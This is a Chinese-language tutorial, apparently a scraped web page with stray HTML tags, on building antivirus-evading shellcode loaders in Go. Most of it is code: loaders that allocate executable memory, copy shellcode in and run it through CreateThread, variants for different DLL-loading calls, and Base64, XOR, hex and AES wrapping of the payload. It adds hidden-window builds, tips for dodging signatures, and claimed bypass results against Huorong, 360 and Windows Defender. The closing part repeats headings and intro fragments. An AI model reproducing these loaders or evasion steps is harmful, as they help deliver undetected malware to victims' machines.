Golang免杀技术详解<\/h1>

前言<\/h2>
本文详细讲解如何使用Golang实现Shellcode的免杀技术，涵盖多种DLL调用方式、Shellcode加密方法以及绕过杀毒软件的技巧。通过组合不同的技术手段，可以有效绕过AV检测。<\/p>

基础知识<\/h2>

Windows API调用流程<\/h3>

执行Shellcode的常规流程：<\/p>

申请虚拟内存<\/li>
把Shellcode写入虚拟内存<\/li>

调用写入Shellcode的虚拟内存<\/li> <\/ol>

Golang调用Windows API的方式<\/h3>
Golang中调用Windows API需要导入DLL并获取函数地址。以下是几种主要的调用方式：<\/p>

1. 获取DLL句柄的方法<\/h4>

syscall包<\/strong>：提供低级操作系统原语接口<\/p>

LoadLibrary<\/code>：基础DLL加载函数<\/li>
LoadDLL<\/code>：加载命名的DLL文件（可能存在DLL预加载攻击风险）<\/li>
MustLoadDLL<\/code>：类似LoadDLL，但加载失败会panic<\/li>
NewLazyDLL<\/code>：延迟加载DLL，直到第一次调用<\/li> <\/ul> 2. 从DLL获取函数的方法<\/h4> GetProcAddress<\/code>：获取函数地址<\/li> FindProc<\/code>：在DLL中搜索指定过程<\/li> MustFindProc<\/code>：类似FindProc，但搜索失败会panic<\/li> NewProc<\/code>：为LazyDLL创建过程访问<\/li> <\/ul> 3. 函数调用的方法<\/h4> SyscallN<\/code>：直接系统调用<\/li> Call<\/code>：通过Proc结构调用函数<\/li> <\/ul> Shellcode加载实现<\/h2> 基础实现代码<\/h3> package<\/span> main<\/span> <\/span><\/span> <\/span><\/span>import<\/span> ( <\/span><\/span> "syscall"<\/span> <\/span><\/span> "unsafe"<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span>const<\/span> ( <\/span><\/span> MEM_COMMIT<\/span> = 0x1000<\/span> <\/span><\/span> MEM_RESERVE<\/span> = 0x2000<\/span> <\/span><\/span> PAGE_EXECUTE_READWRITE<\/span> = 0x40<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span>var<\/span> ( <\/span><\/span> kernel32<\/span>, _<\/span> = syscall<\/span>.LoadLibrary<\/span>("Kernel32.dll"<\/span>) <\/span><\/span> createThread<\/span>, _<\/span> = syscall<\/span>.GetProcAddress<\/span>(kernel32<\/span>, "CreateThread"<\/span>) <\/span><\/span> virtualAlloc<\/span>, _<\/span> = syscall<\/span>.GetProcAddress<\/span>(kernel32<\/span>, "VirtualAlloc"<\/span>) <\/span><\/span> rtlMoveMemory<\/span>, _<\/span> = syscall<\/span>.GetProcAddress<\/span>(kernel32<\/span>, "RtlMoveMemory"<\/span>) <\/span><\/span> waitForSingleObject<\/span>, _<\/span> = syscall<\/span>.GetProcAddress<\/span>(kernel32<\/span>, "WaitForSingleObject"<\/span>) <\/span><\/span> syscallN<\/span> = syscall<\/span>.SyscallN<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span>func<\/span> main<\/span>() { <\/span><\/span> buf<\/span> :=<\/span> []byte("\xfc\x48\x83..."<\/span>) \/\/ Shellcode <\/span><\/span><\/span><\/span> <\/span><\/span> lpMem<\/span>, _<\/span>, _<\/span> :=<\/span> syscallN<\/span>(virtualAlloc<\/span>, uintptr(0<\/span>), uintptr(len(buf<\/span>)), <\/span><\/span> MEM_COMMIT<\/span>|MEM_RESERVE<\/span>, PAGE_EXECUTE_READWRITE<\/span>) <\/span><\/span> <\/span><\/span> _<\/span>, _<\/span>, _<\/span> = syscallN<\/span>(rtlMoveMemory<\/span>, lpMem<\/span>, uintptr(unsafe<\/span>.Pointer<\/span>(&<\/span>buf<\/span>[0<\/span>])), <\/span><\/span> uintptr(len(buf<\/span>))) <\/span><\/span> <\/span><\/span> \/\/ 方法1: 创建线程执行 <\/span><\/span><\/span><\/span> hThread<\/span>, _<\/span>, _<\/span> :=<\/span> syscallN<\/span>(createThread<\/span>, 0<\/span>, 0<\/span>, lpMem<\/span>, 0<\/span>, 0<\/span>, 0<\/span>) <\/span><\/span> _<\/span>, _<\/span>, _<\/span> = syscallN<\/span>(waitForSingleObject<\/span>, hThread<\/span>, uintptr(0xffff<\/span>)) <\/span><\/span> <\/span><\/span> \/\/ 方法2: 直接调用 <\/span><\/span><\/span><\/span> \/\/ syscallN(lpMem) <\/span><\/span><\/span><\/span> <\/span><\/span> _<\/span> = syscall<\/span>.FreeLibrary<\/span>(kernel32<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre>隐藏控制台窗口<\/h3> 编译时添加参数隐藏黑框：<\/p> go build -ldflags=<\/span>"-H windowsgui"<\/span> xxx.go <\/span><\/span><\/code><\/pre>Shellcode加密技术<\/h2> 1. Base64加密<\/h3> \/\/ 加密 <\/span><\/span><\/span><\/span>enc<\/span> :=<\/span> base64<\/span>.StdEncoding<\/span>.EncodeToString<\/span>(buf<\/span>) <\/span><\/span>fmt<\/span>.Println<\/span>(enc<\/span>) <\/span><\/span> <\/span><\/span>\/\/ 解密 <\/span><\/span><\/span><\/span>dec<\/span>, _<\/span> :=<\/span> base64<\/span>.StdEncoding<\/span>.DecodeString<\/span>(enc<\/span>) <\/span><\/span>fmt<\/span>.Println<\/span>(dec<\/span>) <\/span><\/span><\/code><\/pre>2. 异或加密<\/h3> \/\/ 加密\/解密 <\/span><\/span><\/span><\/span>for<\/span> i<\/span> :=<\/span> 0<\/span>; i<\/span> < len(buf<\/span>); i<\/span>++<\/span> { <\/span><\/span> buf<\/span>[i<\/span>] ^= 50<\/span> \/\/ 异或密钥 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>3. Hex编码<\/h3> \/\/ 加密 <\/span><\/span><\/span><\/span>enc<\/span> :=<\/span> hex<\/span>.EncodeToString<\/span>(buf<\/span>) <\/span><\/span>fmt<\/span>.Println<\/span>(enc<\/span>) <\/span><\/span> <\/span><\/span>\/\/ 解密 <\/span><\/span><\/span><\/span>dec<\/span>, _<\/span> :=<\/span> hex<\/span>.DecodeString<\/span>(enc<\/span>) <\/span><\/span>fmt<\/span>.Println<\/span>(string(dec<\/span>)) <\/span><\/span><\/code><\/pre>4. AES加密（CBC模式）<\/h3> func<\/span> pkcs5Padding<\/span>(ciphertext<\/span> []byte<\/span>, blockSize<\/span> int<\/span>) []byte<\/span> { <\/span><\/span> padding<\/span> :=<\/span> blockSize<\/span> -<\/span> len(ciphertext<\/span>)%<\/span>blockSize<\/span> <\/span><\/span> padtext<\/span> :=<\/span> bytes<\/span>.Repeat<\/span>([]byte<\/span>{byte(padding<\/span>)}, padding<\/span>) <\/span><\/span> return<\/span> append(ciphertext<\/span>, padtext<\/span>...<\/span>) <\/span><\/span>} <\/span><\/span> <\/span><\/span>func<\/span> pkcs5UnPadding<\/span>(origData<\/span> []byte<\/span>) []byte<\/span> { <\/span><\/span> length<\/span> :=<\/span> len(origData<\/span>) <\/span><\/span> unpadding<\/span> :=<\/span> int(origData<\/span>[length<\/span>-<\/span>1<\/span>]) <\/span><\/span> return<\/span> origData<\/span>[:(length<\/span> -<\/span> unpadding<\/span>)] <\/span><\/span>} <\/span><\/span> <\/span><\/span>func<\/span> AesDecryptCBC<\/span>(encrypted<\/span> []byte<\/span>, key<\/span> []byte<\/span>) (decrypted<\/span> []byte<\/span>) { <\/span><\/span> block<\/span>, _<\/span> :=<\/span> aes<\/span>.NewCipher<\/span>(key<\/span>) <\/span><\/span> blockSize<\/span> :=<\/span> block<\/span>.BlockSize<\/span>() <\/span><\/span> blockMode<\/span> :=<\/span> cipher<\/span>.NewCBCDecrypter<\/span>(block<\/span>, key<\/span>[:blockSize<\/span>]) <\/span><\/span> decrypted<\/span> = make([]byte<\/span>, len(encrypted<\/span>)) <\/span><\/span> blockMode<\/span>.CryptBlocks<\/span>(decrypted<\/span>, encrypted<\/span>) <\/span><\/span> decrypted<\/span> = pkcs5UnPadding<\/span>(decrypted<\/span>) <\/span><\/span> return<\/span> decrypted<\/span> <\/span><\/span>} <\/span><\/span> <\/span><\/span>func<\/span> AesEncryptCBC<\/span>(origData<\/span> []byte<\/span>, key<\/span> []byte<\/span>) (encrypted<\/span> []byte<\/span>) { <\/span><\/span> block<\/span>, _<\/span> :=<\/span> aes<\/span>.NewCipher<\/span>(key<\/span>) <\/span><\/span> blockSize<\/span> :=<\/span> block<\/span>.BlockSize<\/span>() <\/span><\/span> origData<\/span> = pkcs5Padding<\/span>(origData<\/span>, blockSize<\/span>) <\/span><\/span> blockMode<\/span> :=<\/span> cipher<\/span>.NewCBCEncrypter<\/span>(block<\/span>, key<\/span>[:blockSize<\/span>]) <\/span><\/span> encrypted<\/span> = make([]byte<\/span>, len(origData<\/span>)) <\/span><\/span> blockMode<\/span>.CryptBlocks<\/span>(encrypted<\/span>, origData<\/span>) <\/span><\/span> return<\/span> encrypted<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>不同DLL调用方式的实现<\/h2> 1. LoadDLL方式<\/h3> var<\/span> ( <\/span><\/span> kernel32<\/span>, _<\/span> = syscall<\/span>.LoadDLL<\/span>("Kernel32.dll"<\/span>) <\/span><\/span> createThread<\/span>, _<\/span> = kernel32<\/span>.FindProc<\/span>("CreateThread"<\/span>) <\/span><\/span> virtualAlloc<\/span>, _<\/span> = kernel32<\/span>.FindProc<\/span>("VirtualAlloc"<\/span>) <\/span><\/span> rtlMoveMemory<\/span>, _<\/span> = kernel32<\/span>.FindProc<\/span>("RtlMoveMemory"<\/span>) <\/span><\/span> waitForSingleObject<\/span>, _<\/span> = kernel32<\/span>.FindProc<\/span>("WaitForSingleObject"<\/span>) <\/span><\/span>) <\/span><\/span> <\/span><\/span>func<\/span> main<\/span>() { <\/span><\/span> \/\/ 调用方式 <\/span><\/span><\/span><\/span> lpMem<\/span>, _<\/span>, _<\/span> :=<\/span> virtualAlloc<\/span>.Call<\/span>(uintptr(0<\/span>), uintptr(len(buf<\/span>)), <\/span><\/span> MEM_COMMIT<\/span>|MEM_RESERVE<\/span>, PAGE_EXECUTE_READWRITE<\/span>) <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> _<\/span> = kernel32<\/span>.Release<\/span>() <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. MustLoadDLL方式<\/h3> var<\/span> ( <\/span><\/span> kernel32<\/span> = syscall<\/span>.MustLoadDLL<\/span>("Kernel32.dll"<\/span>) <\/span><\/span> createThread<\/span> = kernel32<\/span>.MustFindProc<\/span>("CreateThread"<\/span>) <\/span><\/span> virtualAlloc<\/span> = kernel32<\/span>.MustFindProc<\/span>("VirtualAlloc"<\/span>) <\/span><\/span> rtlMoveMemory<\/span> = kernel32<\/span>.MustFindProc<\/span>("RtlMoveMemory"<\/span>) <\/span><\/span> waitForSingleObject<\/span> = kernel32<\/span>.MustFindProc<\/span>("WaitForSingleObject"<\/span>) <\/span><\/span>) <\/span><\/span><\/code><\/pre>3. NewLazyDLL方式<\/h3> var<\/span> ( <\/span><\/span> kernel32<\/span> = syscall<\/span>.NewLazyDLL<\/span>("Kernel32.dll"<\/span>) <\/span><\/span> createThread<\/span> = kernel32<\/span>.NewProc<\/span>("CreateThread"<\/span>) <\/span><\/span> virtualAlloc<\/span> = kernel32<\/span>.NewProc<\/span>("VirtualAlloc"<\/span>) <\/span><\/span> rtlMoveMemory<\/span> = kernel32<\/span>.NewProc<\/span>("RtlMoveMemory"<\/span>) <\/span><\/span> waitForSingleObject<\/span> = kernel32<\/span>.NewProc<\/span>("WaitForSingleObject"<\/span>) <\/span><\/span>) <\/span><\/span><\/code><\/pre>加载器实现<\/h2> Base64加载器<\/h3> package<\/span> main<\/span> <\/span><\/span> <\/span><\/span>import<\/span> ( <\/span><\/span> "encoding\/base64"<\/span> <\/span><\/span> "os"<\/span> <\/span><\/span> "syscall"<\/span> <\/span><\/span> "unsafe"<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span>\/\/ ... 常量定义和变量声明 ... <\/span><\/span><\/span><\/span> <\/span><\/span>func<\/span> main<\/span>() { <\/span><\/span> b64<\/span> :=<\/span> os<\/span>.Args<\/span>[1<\/span>] \/\/ 从命令行参数获取base64编码的shellcode <\/span><\/span><\/span><\/span> buf<\/span>, _<\/span> :=<\/span> base64<\/span>.StdEncoding<\/span>.DecodeString<\/span>(b64<\/span>) <\/span><\/span> <\/span><\/span> \/\/ ... 内存分配和shellcode执行代码 ... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>Hex加载器<\/h3> func<\/span> main<\/span>() { <\/span><\/span> hexStr<\/span> :=<\/span> os<\/span>.Args<\/span>[1<\/span>] <\/span><\/span> buf<\/span>, _<\/span> :=<\/span> hex<\/span>.DecodeString<\/span>(hexStr<\/span>) <\/span><\/span> <\/span><\/span> \/\/ ... 内存分配和shellcode执行代码 ... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>AES加载器<\/h3> func<\/span> main<\/span>() { <\/span><\/span> encHex<\/span> :=<\/span> os<\/span>.Args<\/span>[1<\/span>] <\/span><\/span> key<\/span> :=<\/span> []byte("0123456789123456"<\/span>) \/\/ 密钥 <\/span><\/span><\/span><\/span> <\/span><\/span> enc<\/span>, _<\/span> :=<\/span> hex<\/span>.DecodeString<\/span>(encHex<\/span>) <\/span><\/span> buf<\/span> :=<\/span> AesDecryptCBC<\/span>(enc<\/span>, key<\/span>) <\/span><\/span> <\/span><\/span> \/\/ ... 内存分配和shellcode执行代码 ... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>免杀技巧总结<\/h2> 多种DLL调用方式组合<\/strong>：交替使用不同DLL加载方法<\/li> Shellcode加密<\/strong>：使用Base64、异或、Hex、AES等多种加密方式<\/li> 参数外部传入<\/strong>：避免在代码中直接包含Shellcode<\/li> 隐藏控制台窗口<\/strong>：编译时使用-H windowsgui<\/code>参数<\/li> 函数名混淆<\/strong>：使用中文变量名或其他混淆方式<\/li> 加载器分离<\/strong>：将Shellcode与加载器分离，降低检测风险<\/li> <\/ol> 测试结果<\/h2> 火绒<\/strong>：基础实现即可绕过<\/li> 360安全卫士<\/strong>：需要配合加密技术（异或或AES）<\/li> Windows Defender<\/strong>：加密后可以绕过<\/li> <\/ul> 注意事项<\/h2> 避免在代码中直接包含Shellcode，容易被沙箱检测<\/li> 加载器需要配合载体存储Shellcode<\/li> 不同杀毒软件可能需要不同的绕过技术组合<\/li> 定期更新加密方式和调用方法，避免特征被捕获<\/li> <\/ol> 通过以上技术的组合使用，可以有效实现Golang编写的Shellcode加载器的免杀效果。<\/p>

Golang免杀技术详解<\/h1>

前言<\/h2> 本文详细讲解如何使用Golang实现Shellcode的免杀技术，涵盖多种DLL调用方式、Shellcode加密方法以及绕过杀毒软件的技巧。通过组合不同的技术手段，可以有效绕过AV检测。<\/p>

基础知识<\/h2>

Golang调用Windows API的方式<\/h3> Golang中调用Windows API需要导入DLL并获取函数地址。以下是几种主要的调用方式：<\/p>

Shellcode加载实现<\/h2>

Shellcode加密技术<\/h2>

不同DLL调用方式的实现<\/h2>

加载器实现<\/h2>

前言<\/h2>
本文详细讲解如何使用Golang实现Shellcode的免杀技术，涵盖多种DLL调用方式、Shellcode加密方法以及绕过杀毒软件的技巧。通过组合不同的技术手段，可以有效绕过AV检测。<\/p>

Golang调用Windows API的方式<\/h3>
Golang中调用Windows API需要导入DLL并获取函数地址。以下是几种主要的调用方式：<\/p>